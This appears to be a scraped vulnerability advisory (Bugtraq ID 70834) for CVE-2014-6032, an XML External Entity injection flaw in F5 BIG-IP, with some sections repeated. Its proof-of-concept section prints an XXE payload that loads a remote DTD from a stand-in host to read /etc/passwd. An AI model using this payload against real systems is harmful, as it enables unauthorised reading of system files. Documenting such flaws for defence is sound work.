F5 Networks BIG-IP CVE-2014-6032 XML External Entity Injection Vulnerability
BID:70834
Info
F5 Networks BIG-IP CVE-2014-6032 XML External Entity Injection Vulnerability
| Bugtraq ID: | 70834 |
| Class: | Design Error |
| CVE: |
CVE-2014-6032 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 22 2014 12:00AM |
| Updated: | Oct 22 2014 12:00AM |
| Credit: | Oliver Gruskovnjak |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
F5 Networks BIG-IP CVE-2014-6032 XML External Entity Injection Vulnerability
F5 Networks BIG-IP is prone to an XML External Entity injection vulnerability.
Attackers can exploit this issue to obtain potentially sensitive information and to carry out other attacks.
F5 Networks BIG-IP is prone to an XML External Entity injection vulnerability.
Attackers can exploit this issue to obtain potentially sensitive information and to carry out other attacks.
Exploit / POC
F5 Networks BIG-IP CVE-2014-6032 XML External Entity Injection Vulnerability
Attackers can use readily available tools to exploit this issue.
The following example payload is available:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://www.example.com/xml?f=/etc/passwd"> %remote;
%int;
%trick;]>
<deal type="request" id="1"><card type="query" id="1"/></deal>
Attackers can use readily available tools to exploit this issue.
The following example payload is available:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://www.example.com/xml?f=/etc/passwd"> %remote;
%int;
%trick;]>
<deal type="request" id="1"><card type="query" id="1"/></deal>
Solution / Fix
F5 Networks BIG-IP CVE-2014-6032 XML External Entity Injection Vulnerability
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
F5 Networks BIG-IP CVE-2014-6032 XML External Entity Injection Vulnerability
References:
References:
- F5 BIG-IP Homepage (F5)